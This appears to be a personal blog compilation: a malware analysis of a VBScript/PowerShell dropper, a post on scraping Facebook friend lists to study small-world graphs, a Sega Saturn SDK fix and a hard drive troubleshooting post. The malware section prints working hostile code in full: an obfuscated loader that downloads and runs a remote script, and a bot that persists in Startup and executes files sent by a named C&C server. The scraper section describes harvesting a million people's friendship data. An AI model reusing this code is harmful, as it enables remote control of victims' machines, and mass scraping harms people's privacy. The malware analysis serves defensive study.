CreateObject("Wscript.shEll").Run("POWERSHELL  $00Q1KNH<##>='(New-';[<##>System.Threading.Thread<##>]::Sleep(2300);$AD77UAZ<##> = '!!!!!!!!!!!! '.Replace(<##>'!!!!!!!!!!!!'<##>,'Object'<##>);<##>$UDKKQV0 <##>= <##>'Net'<##>;<##>$E6IWW9R<##> = <##>'.We';[<##>System.Threading.Thread<##>]::Sleep(2300);<##>$G4OKYRL<##>='.Downlo';<##>$ZT2X8YH<##> = <##>'bClient)';<##>$OOK2YVD=<##>'adString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')'<##>;<##>[<##>System.Threading.Thread<##>]::Sleep(2300);$8ZRVUBH<##>=I`E`X (<##>$00Q1KNH<##>,<##>$AD77UAZ<##>,<##>$UDKKQV0<##>,<##>$E6IWW9R<##>,<##>$ZT2X8YH<##>,<##>$G4OKYRL<##>,$OOK2YVD<##> <##>-Join <##>''<##>)<##>|I`E`X"),0,True
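I did this cleanup by hand, but the two steps are mechanical enough to sketch in Rust. Both helpers below (split_statements and deobfuscate) are hypothetical names for this illustration; the splitter only knows about double-quoted strings, which is enough for this sample but is not a VBScript parser.

```rust
/// Splits a VBScript line on `:` statement separators, ignoring any `:`
/// found inside a double-quoted string (such as the one in "https://").
fn split_statements(line: &str) -> Vec<String> {
    let mut statements = Vec::new();
    let mut current = String::new();
    let mut in_string = false;
    for c in line.chars() {
        match c {
            '"' => {
                // A doubled quote ("") inside a string toggles twice,
                // which leaves the state unchanged.
                in_string = !in_string;
                current.push(c);
            }
            ':' if !in_string => statements.push(std::mem::take(&mut current)),
            _ => current.push(c),
        }
    }
    if !current.is_empty() {
        statements.push(current);
    }
    statements
}

/// Evaluates a `replace(obfuscated, junk, real)` call the way the script would.
fn deobfuscate(obfuscated: &str, junk: &str, real: &str) -> String {
    obfuscated.replace(junk, real)
}

fn main() {
    for statement in split_statements("on error resume next:x = \"a:b\":WScript.Sleep 2000") {
        println!("{}", statement);
    }
    println!("{}", deobfuscate("WiDDXetmcript.iDDXetmhEll", "iDDXetm", "s"));
    println!("{}", deobfuscate("POWlZsTwIURSHlZsTwIULL", "lZsTwIU", "E"));
}
```

The junk markers are only there to hide the names of the shell object and of PowerShell from naive string scanners; once substituted back, nothing is left of the disguise.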

Sleeps 4 seconds and runs PowerShell with some weird code. Let's have a look at the PowerShell code:

$00Q1KNH<##>='(New-';[<##>System.Threading.Thread<##>]::Sleep(2300);$AD77UAZ<##> = '!!!!!!!!!!!! '.Replace(<##>'!!!!!!!!!!!!'<##>,'Object'<##>);<##>$UDKKQV0 <##>= <##>'Net'<##>;<##>$E6IWW9R<##> = <##>'.We';[<##>System.Threading.Thread<##>]::Sleep(2300);<##>$G4OKYRL<##>='.Downlo';<##>$ZT2X8YH<##> = <##>'bClient)';<##>$OOK2YVD=<##>'adString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')'<##>;<##>[<##>System.Threading.Thread<##>]::Sleep(2300);$8ZRVUBH<##>=I`E`X (<##>$00Q1KNH<##>,<##>$AD77UAZ<##>,<##>$UDKKQV0<##>,<##>$E6IWW9R<##>,<##>$ZT2X8YH<##>,<##>$G4OKYRL<##>,$OOK2YVD<##> <##>-Join <##>''<##>)<##>|I`E`X

Let's remove all those <##>s and merge all those strings:

[System.Threading.Thread]::Sleep(2300);
[System.Threading.Thread]::Sleep(2300);
[System.Threading.Thread]::Sleep(2300);
$8ZRVUBH=I`E`X ('(New-Object Net.WebClient).DownloadString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')' -Join '')|I`E`X
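The same cleanup can be sketched in a few lines of Rust. The <##> sequences look like empty PowerShell block comments (an opening <# immediately closed by #>), so dropping them does not change what the script does. The helper names are hypothetical, and the example only joins the first five fragments from the script above, in the order given to -Join.

```rust
/// Removes the `<##>` filler scattered through the script.
fn strip_filler(code: &str) -> String {
    code.replace("<##>", "")
}

/// Concatenates string fragments, like `-Join ''` does in the script.
fn join_fragments(fragments: &[&str]) -> String {
    fragments.concat()
}

fn main() {
    // One statement taken from the script above.
    println!("{}", strip_filler("$UDKKQV0 <##>= <##>'Net'<##>;"));

    // '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!', 'Object') yields "Object "
    // (note the trailing space that survives the replacement).
    let object = "!!!!!!!!!!!! ".replace("!!!!!!!!!!!!", "Object");

    // Values of $00Q1KNH, $AD77UAZ, $UDKKQV0, $E6IWW9R and $ZT2X8YH, in that order.
    let fragments = ["(New-", object.as_str(), "Net", ".We", "bClient)"];
    println!("{}", join_fragments(&fragments));
}
```

Splitting the command into innocuous-looking pieces means the telltale string never appears as a whole in the file, only at runtime once the pieces are joined.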

Much more readable! So this is just sleeping about 7 seconds and then... it downloads a text file... and runs it? Let's have a look at the link.

upv.es is the official website of the Universitat Politècnica de València (Technical University of Valencia). webs.upv.es is the subdomain corresponding to the Web hosting service provided by the university. cursosinf.webs.upv.es corresponds, I can only guess, to the IT department of the school.

The website is empty at the time I'm writing:

But the file itself is still online, and looks like this:

try
{
$OutPath = "C:\ProgramData\Links"
if (-not (Test-Path $OutPath))
        {
            New-Item $OutPath -ItemType Directory -Force
        }

(New-Object Net.WebClient).DownloadFile('https://cursosinf.webs.upv.es/wp-includes//js/jcrop/1.txt', 'C:\ProgramData\Links\1.bat')
Start-Sleep 3
start C:\ProgramData\Links/1.bat

Start-Sleep 10

$Content = @'
<binary content>

This downloads a batch file which we'll analyse later.

Right now, it's creating an(other) VBS file (comments are mine):

On error resume next

Public IP, Port, SPL, A, StartupCheck

Set WshNetwork = CreateObject("Wscript.Network")
Set MyObject = CreateObject("Wscript.Shell")

' C&C (Command and Control server)
IP = "185.81.157.26"
Port = "5734"
StartupCheck = "True"
SPL = "|" & "V" & "|"

' Sends a synchronous HTTP POST request to the C&C server and returns the response text
Function POST(ByVal DA, ByVal Param)
	On error resume next
	Dim MSXML, PO, HTTP, UserAgent
	MSXML = "Microsoft.XMLHTTP"
	PO = "POST"
	HTTP = "http://"
	UserAgent = "User-Agent:"
	
	Dim ResponseText
	Set ObjHTTP = CreateObject(MSXML)
	ObjHTTP.Open PO, HTTP & IP & ":" & Port & "/" & DA, False
	ObjHTTP.SetRequestHeader UserAgent, INF
	ObjHTTP.Send Param
	ResponseText = ObjHTTP.ResponseText
	POST = ResponseText
End Function

' Installs the current script in the Startup folder, so that it gets executed at each boot
Sub Installation()
If StartupCheck = "True" Then
	Set FSO = CreateObject("Scripting.FileSystemObject")
	FSO.CopyFile Wscript.ScriptFullName, MyObject.SpecialFolders("Startup") & "\Install32.vbs"
End If
End Sub

Call Installation

Function RandomString()
    Dim str, min, max
    Const LETTERS = "ABCDEFGHIJKLMOPQRSTVWXYZ0123456789"
    min = 1
    max = 15
    Randomize
    For i = 1 to 15
        str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 )
    Next
    RandomString = str
End Function

' Queries WMI (Win32_ComputerSystemProduct) to build a hardware ID for the machine
' Note: the query selects Version, but the loop reads IdentifyingNumber
Function HWID
	Dim objWMIService, colItems, result
	Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
	Set colItems = objWMIService.ExecQuery("SELECT Version FROM Win32_ComputerSystemProduct")
	For Each objItem in colItems
		result = result & objItem.IdentifyingNumber
	Next
	HWID = result
End Function

' Generates a string with the format 
' \PCNAME\Account\Microsoft Windows 10 Professionnel\Windows Defender\Yes\Yes\FALSE\
Function INF
	Dim VR, AV, OS, PC, USER, ID
	VR = "v0.2"
	AV = "Windows Defender"
	PC = WshNetwork.ComputerName
	USER = WshNetwork.UserName
	ID = HWID
		
	Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
	Set colItems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem",,48)
	For Each objItem in colItems
		OS = OS + objItem.Caption
	Next
	INF = ID & "\" & PC & "\" & USER & "\" & OS & "\" & AV & "\" & "Yes" & "\" & "Yes" & "\" & "FALSE" & "\"
End Function

' Creates a file, fills it with the specified content
' If the extension is PS1, run it with PowerShell
' Otherwise, run it directly
Sub CreateEmptyFile(ByVal Content, ByVal Filename)
	Set FSO = CreateObject("Scripting.FileSystemObject")
	Set FileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile(FSO.GetSpecialFolder(2) & "\" & Filename, 2, True)
	FileToWrite.WriteLine(Content)
	FileToWrite.Close
	Set FileToWrite = Nothing
	WScript.Sleep 2000
	If InStr(Filename, ".PS1") = 0 Then
		MyObject.RuN FSO.GetSpecialFolder(2) & "\" & Filename
	Else
		MyObject.ruN "POWERSHELL -EXECUTIONPOLICY REMOTESIGNED -FILE " + FSO.GetSpecialFolder(2) & "\" & Filename, 0
	End If
End Sub

' The interesting part!
' The main control loop
' This fetches, every 3 seconds, a "command" from the C&C server
' This is how the server "tells" the infected computer what to do
Do While True
	A = Split(POST("Vre", ""), SPL)
	Select Case A(0)
    	' creates and runs a file with content and filename
		Case "RF"
			CreateEmptyFile A(1), A(2)
        ' creates and runs a PowerShell file with content and random filename
		Case "TR"
			CreateEmptyFile A(1), RandomString & ".PS1"
        ' stops the control script
		Case "Cl"
			Wscript.Quit
        ' creates and runs a VBScript file with content and random filename
		Case "exc"
			CreateEmptyFile A(1), RandomString & ".vbs"
        ' same as RF, no idea why they made two of them
		Case "Sc"
			CreateEmptyFile A(1), A(2)
        ' same as Cl
		Case "Un"
			Wscript.Quit
	End Select
	WScript.Sleep 3000
Loop

The VBS file is then saved and launched:

'@
Set-Content -Path C:\ProgramData\Links\install.vbs -Value $Content

Start-Sleep 3
start C:\ProgramData\Links\install.vbs

} catch { }

It's quite interesting how "simple" the virus is, really. At its core, it's just a loop that endlessly POSTs to a server and does something depending on the response.
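To make that "protocol" concrete, here is a small analysis-only sketch that takes a captured server response and says what the VBS loop above would do with it. It runs nothing; the opcode table is simply read off the Select Case block, and the names `describe_command` and `COMMANDS`, as well as the "malformed" message, are mine.

```python
# Separator the script builds as "|" & "V" & "|"
SEPARATOR = "|V|"

# Opcode -> (what the VBS does, number of arguments it reads from A(1), A(2))
COMMANDS = {
    "RF": ("write content to the given filename and run it", 2),
    "TR": ("write content to a random .PS1 file and run it with PowerShell", 1),
    "Cl": ("quit the control script", 0),
    "exc": ("write content to a random .vbs file and run it", 1),
    "Sc": ("write content to the given filename and run it", 2),
    "Un": ("quit the control script", 0),
}


def describe_command(response: str) -> str:
    """Explain what the control loop would do with one server response."""
    fields = response.split(SEPARATOR)
    opcode = fields[0]
    if opcode not in COMMANDS:
        return "ignored (no matching Case)"
    description, argc = COMMANDS[opcode]
    if len(fields) - 1 < argc:
        # Hypothetical label: the real script would just hit an error and resume
        return f"{opcode}: malformed, expected {argc} argument(s)"
    return f"{opcode}: {description}"


print(describe_command("TR|V|Write-Host hello"))
```

Six opcodes, two of which are duplicates of two others: that really is the whole command set.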

Six handshakes away

Have you ever heard about "six degrees of separation"? It's the famous idea that there are always fewer than about six people between two individuals chosen at random in a population. Given enough people, you'll always find someone whose uncle's colleague has a friend who knows your next-door neighbour.

Fun fact: it's where the name of the long-forgotten social network sixdegrees.com came from.

Mathematically, it checks out. If you have 10 friends and each of those friends has 10 friends (you being one of them), in theory that's a total of 1+10+9*10=101 individuals. In practice, when you have 10 friends, they probably know each other as well, and their friends most probably do too. You end up with way fewer than 101 people, and no two people in your "social graph" ever end up more than one or two handshakes away from each other.
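The same arithmetic can be pushed a few handshakes further. This is only a sketch of the theoretical upper bound, assuming nobody shares a friend with anybody else (so the graph is a tree); the function name `max_reachable` is made up for the occasion.

```python
def max_reachable(friends_each: int, handshakes: int) -> int:
    """Upper bound on people within `handshakes` steps, counting yourself.

    Assumes no two people share a friend, i.e. the social graph is a tree.
    """
    total = 1                    # you
    frontier = friends_each      # people exactly one handshake away
    for _ in range(handshakes):
        total += frontier
        # everyone on the frontier brings all their friends except
        # the one person who led us to them
        frontier *= friends_each - 1
    return total


for k in range(1, 7):
    print(k, max_reachable(10, k))
```

With 10 friends each, two handshakes give the 101 from above, and six handshakes already give 664301. Real social graphs overlap a lot, so the actual numbers are much lower, but the growth is still exponential.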

In graph theory, those kinds of graphs where you have densely connected communities, linked together by "hubs", i.e. high-degree nodes, are called "small-world networks".

Oh you know Bob? Isn't it a small world!

I learned about it a few weeks ago in a very nice (French) video on the subject, and immediately thought "I wonder what the graph of everyone I know looks like". Obviously, I can't exhaustively list every single person I've met in my life and put them on a graph.

Or can I?


One of the few good things™ Facebook gave us is really fast access to petabytes of data about people we know, and especially our relationships with them. I can open up my childhood best friend's profile page and see everyone he's "friends" with, and click on a random person and see who they're friends with, et cætera. So I started looking for the documentation for Facebook's public API which, obviously, exists and allows for looking up this kind of information. I quickly learned that the exact API I was looking for didn't exist anymore, and all of the "alternative" options (Web scrapers) I found were either partially or completely broken.

So I opened up PyCharm and started working on my own scraper, which would simply open up Facebook in a Chromium WebDriver instance and fetch data using ugly XPath queries.

def query(tab):
    return "//span[text() = '" + tab + "']/ancestor::div[contains(@style, 'border-radius: max(0px, min(8px, ((100vw')]/div[1]/div[3]/div"
Truly horrible.

After 180 lines and some testing, I had something that worked.

Basically, the script loads a Facebook account's friends list page and scrolls to the bottom, waiting for the list to dynamically load until the end, and then fetches all the links in a specific <div> which each conveniently contain the ID of the friend. It then adds all of those IDs to the stored graph, and iterates through them and repeats the whole process. It's a BFS (breadth-first-search) over webpages.
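Stripped of all the browser automation, the crawl looks roughly like the sketch below. This is not the actual 180-line script: `fetch_friends` is a hypothetical callable standing in for the whole "load the page, scroll, collect the IDs" part, and `max_profiles` is a safety limit I added for the example.

```python
from collections import deque


def crawl(start_id, fetch_friends, max_profiles=1000):
    """Breadth-first crawl returning {profile_id: [friend_ids]}.

    `fetch_friends` is a hypothetical stand-in for the Selenium part.
    """
    graph = {}
    queue = deque([start_id])
    seen = {start_id}
    while queue and len(graph) < max_profiles:
        profile = queue.popleft()
        friends = fetch_friends(profile)
        graph[profile] = friends
        for friend in friends:
            if friend not in seen:
                # first time we meet this ID: visit it later
                seen.add(friend)
                queue.append(friend)
    return graph


# Toy stand-in for Facebook: a dict lookup instead of a browser.
# "cat" plays the role of someone with a hidden friends list.
FAKE = {
    "me": ["ann", "bob"],
    "ann": ["me", "bob", "cat"],
    "bob": ["me", "ann"],
    "cat": [],
}
graph = crawl("me", lambda profile_id: FAKE.get(profile_id, []))
print(list(graph))
```

The queue is what makes it breadth-first: close friends are visited before friends of friends, so stopping the crawl early still leaves a reasonably complete neighbourhood around the starting account.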

In the past few years, a lot of people started realizing just how much stuff they were giving away publicly on their Facebook profile, and consequently made great use of the privacy settings that allow, for example, restricting who can see your friends list. A small step for man, but a giant leap in breaking my scraper. People with a private friends list appear on the graph as leaves, i.e. nodes that only have one neighbour. I ignore those nodes while processing the graph.

It stores the relationships as adjacency lists in a huge JSON file (74 MiB as I'm writing), which are then converted to GEXF using NetworkX.
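As an illustration of the data shape, here is a minimal sketch that reads adjacency lists from JSON, makes the friendships symmetric, and drops the leaves. The exact layout of my JSON file isn't shown here, so the `{"id": ["friend", ...]}` format and both function names are assumptions, and the GEXF conversion itself is left out.

```python
import json


def load_undirected(adjacency_json: str) -> dict:
    """Turn {"id": ["friend", ...]} JSON into symmetric neighbour sets."""
    adjacency = json.loads(adjacency_json)
    neighbours = {}
    for node, friends in adjacency.items():
        neighbours.setdefault(node, set())
        for friend in friends:
            neighbours[node].add(friend)
            # friendship goes both ways, even if we never crawled `friend`
            neighbours.setdefault(friend, set()).add(node)
    return neighbours


def drop_leaves(neighbours: dict) -> dict:
    """Remove nodes with exactly one neighbour (single pass, not recursive)."""
    leaves = {n for n, adj in neighbours.items() if len(adj) == 1}
    return {n: adj - leaves for n, adj in neighbours.items() if n not in leaves}


raw = json.dumps({
    "me": ["ann", "bob", "cat"],
    "ann": ["me", "bob"],
    "bob": ["me", "ann"],
})
core = drop_leaves(load_undirected(raw))
print(sorted(core))
```

Here "cat" only ever shows up in my own list, so it ends up with a single neighbour and gets dropped.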

Now in possession of a real graph, I can fire up Gephi and start analyzing stuff.


The graph you're seeing contains around 1 million nodes, each node corresponding to a Facebook account and each edge meaning two accounts are friends. The nodes and edges are colored according to their modularity class (fancy name for the virtual "community" or "cluster" they belong to), which was computed automatically using equally fancy graph-theoretical algorithms.

At 1 million nodes, the time necessary to lay out the graph and compute the useful measurements is about 60 hours (most of which is spent on calculating the centrality for each node) on my 4th-gen i7 machine.

About those small-world networks. One of their most remarkable properties is that the average length of the shortest path between two nodes chosen at random grows proportionally to the logarithm of the total number of nodes. In other words, even with huge graphs, you'll usually get unexpectedly short paths between nodes.

But what does that mean in practice? On this graph, there are people from dozens of different places where I've lived, studied, worked. Despite that, my dad living near Switzerland is only three handshakes away from my colleagues on the other side of the country.

More formally, the above graph has a diameter of 7. That means that the longest shortest path between any two nodes is 7 edges long: no two people on the graph are more than 7 "online handshakes" away from each other.

In the figure above, we can see the cumulative distribution of degrees on the graph. For a given number N, the curve shows us how many individuals have N or more friends. Intuitively, the curve is monotonically decreasing, because as N gets bigger and bigger, there are fewer and fewer people having that many friends. On the other hand, almost everyone has at least 1 friend.

You may notice a steep hill at the end, around N=5000. This is due to the fact that 5000 is the maximum number of friends you can have on Facebook, so you'll get many people with a number of friends very close to it simply because they've "filled up" their friends list.
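For the curious, the cumulative distribution itself is only a few lines. A minimal sketch on made-up degrees (the real ones come out of Gephi); the function name is mine.

```python
from collections import Counter


def cumulative_degree_distribution(degrees):
    """Return {n: number of nodes with degree >= n} for each observed n."""
    counts = Counter(degrees)
    result = {}
    running = 0
    # walk from the biggest degree down, accumulating as we go
    for n in sorted(counts, reverse=True):
        running += counts[n]
        result[n] = running
    return dict(sorted(result.items()))


# Made-up sample: a few ordinary accounts and two "full" friends lists
degrees = [1, 1, 2, 3, 3, 3, 5000, 5000]
print(cumulative_degree_distribution(degrees))
# → {1: 8, 2: 6, 3: 5, 5000: 2}
```

The two accounts stuck at 5000 are the toy version of the pile-up at the end of the real curve.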

We can enumerate all pairs of individuals on the graph and compute the length of the shortest path between the two, which gives the following figure:

In this graph, the average distance between individuals is 3.3, which is lower than the one found in the Facebook paper (4.7). This can be explained by the fact that the researchers had access to the entire Facebook database whereas I only have access to the graph I obtained through scraping.
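Both the average distance and the diameter come from the same computation: a breadth-first search from every node. Gephi did this for me on the real graph; the sketch below does it by brute force on a toy graph, assumes the graph is connected, and uses names of my own.

```python
from collections import deque


def distances_from(graph, source):
    """Shortest path length (in edges) from `source` to every reachable node."""
    dist = {source: 0}
    queue = deque([source])
    while queue:
        node = queue.popleft()
        for neighbour in graph[node]:
            if neighbour not in dist:
                dist[neighbour] = dist[node] + 1
                queue.append(neighbour)
    return dist


def path_stats(graph):
    """Return (average shortest path length, diameter) of a connected graph."""
    lengths = []
    for node in graph:
        dist = distances_from(graph, node)
        lengths.extend(d for other, d in dist.items() if other != node)
    return sum(lengths) / len(lengths), max(lengths)


# A chain a-b-c-d with one shortcut between a and c
toy = {
    "a": {"b", "c"},
    "b": {"a", "c"},
    "c": {"a", "b", "d"},
    "d": {"c"},
}
average, diameter = path_stats(toy)
print(average, diameter)
```

One BFS per node is fine for four nodes; at a million nodes this is exactly the kind of computation that eats hours.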

The Facebook paper: "The Anatomy of the Facebook Social Graph" (PDF, on ResearchGate)

Fix for the Psy-Q Saturn SDK

If you ever want to write code for the Sega Saturn using the Psy-Q SDK (available here), you may encounter a small problem with the toolset when using #include directives.

Example:

#include "abc.h"

int main()
{
    int b = a + 43;
    return 0;
}
main.c
C:\Psyq\bin>ccsh -ITHING/ -S main.c
build.bat
int a = 98;
abc.h

This will fail with the following error: main.c:1: abc.h: No such file or directory, which is quite strange given that we explicitly told the compiler to look in that THING folder.

What we have:

  • CCSH.EXE: main compiler executable (C Compiler Super-H)
  • CPPSH.EXE: preprocessor (C PreProcessor Super-H)

CCSH first calls CPPSH on the source file to get preprocessed code, and then actually compiles it. Running CPPSH alone still triggers the error, which means the problem does indeed come from CPPSH. After a thorough analysis in IDA, it seems that even though the code that parses the command-line parameters related to include directories is there, those paths are never added to the program's internal directory array and thus never used. I could have patched the binary myself, but I found a faster and simpler way: use the PSX one.

Though CCSH and CCPSX are very different in nature (one compiles for Super-H and one for MIPS), their preprocessors are actually almost identical. When you think about it, it makes sense: the C language doesn't depend on the underlying architecture (most of the time), so why would its preprocessor?

So here's the fix: rename CPPSH.EXE to something else and copy the PSX preprocessor, CPPPSX.EXE, to CPPSH.EXE. This solves the include problem and finally allows compiling C code for the Sega Saturn on Windows (the only other working SDK on the Internet is for DOS, which requires using DOSBox and 8.3 filenames, which makes big projects complicated to organize).

That's nice and all, but can we compile actual code? It seems that the answer is no. Here is a basic file:

#include <stddef.h>
#include <stdlib.h>
#include <stdio.h>

int main()
{
	printf("%d\n", 42);

	return 0;
}

Compiling this will give the following error:

In file included from bin/main.c:2:
D:\SATURN\INCLUDE\stdlib.h:7: conflicting types for 'size_t'
D:\SATURN\INCLUDE\stddef.h:166: previous declaration of 'size_t'

Weird, eh?

It seems that the STDLIB.H file in the SDK is somehow wrong, in that it has the following at the top:

#ifndef	__SIZE_TYPE__DEF
#define	__SIZE_TYPE__DEF	unsigned int
typedef	__SIZE_TYPE__DEF	size_t;
#endif
STDLIB.H

Whereas its friend STDDEF.H looks like this:

#ifndef __SIZE_TYPE__
#define __SIZE_TYPE__ long unsigned int
#endif
#if !(defined (__GNUG__) && defined (size_t))
typedef __SIZE_TYPE__ size_t;
#endif /* !(defined (__GNUG__) && defined (size_t)) */
STDDEF.H

Two incompatible declarations, the compiler dies. The simple fix is to remove the DEF at the end of the names in STDLIB.H, to get something like this:

#ifndef	__SIZE_TYPE__
#define	__SIZE_TYPE__	unsigned int
typedef	__SIZE_TYPE__	size_t;
#endif
STDLIB.H
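If you'd rather not edit the header by hand, the rename is a plain text substitution. A minimal sketch, operating on a string so it can be tried without touching the SDK; reading and writing the actual STDLIB.H (wherever your install puts it) is left to you, and the function name is made up.

```python
def patch_stdlib_header(text: str) -> str:
    """Rename __SIZE_TYPE__DEF to __SIZE_TYPE__ so both headers share one guard."""
    return text.replace("__SIZE_TYPE__DEF", "__SIZE_TYPE__")


# The four offending lines from the top of STDLIB.H
original = (
    "#ifndef\t__SIZE_TYPE__DEF\n"
    "#define\t__SIZE_TYPE__DEF\tunsigned int\n"
    "typedef\t__SIZE_TYPE__DEF\tsize_t;\n"
    "#endif\n"
)
patched = patch_stdlib_header(original)
print(patched)
```

Keep a backup of the original header before overwriting it.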

Solving bizarre hard drive corruption issues

I've recently run into some pretty weird problems with my two USB3 external hard drives: a disk disconnects when I open specific files, then refuses to reconnect to that computer until I plug it into another computer, after which it works again, and so on.

Then I started noticing a pattern. The files that trigger the crash are always files that I have opened on another computer with that hard drive, which should give you a clue about what is going on.

It seems that there's a bug in Windows' drive ejection system. If you plug a hard drive into a computer, open a file in any software that keeps the descriptor open all the time (I'm looking at you, IDA Pro), and then eject the drive without closing the software first (which sometimes happens), the file will somehow still be marked as open in the NTFS attributes. When you then try to open it on another computer, Windows will flip out and disconnect the hard drive. From then on, that computer will refuse to read the drive, showing it as RAW in the management console, even in another OS (I tried Ubuntu and FreeBSD), until you plug the HDD back into the other one. Once you do, it magically unlocks and works again on all computers. This took me about a week to figure out. Hopefully this helps you figure it out in less time than it took me.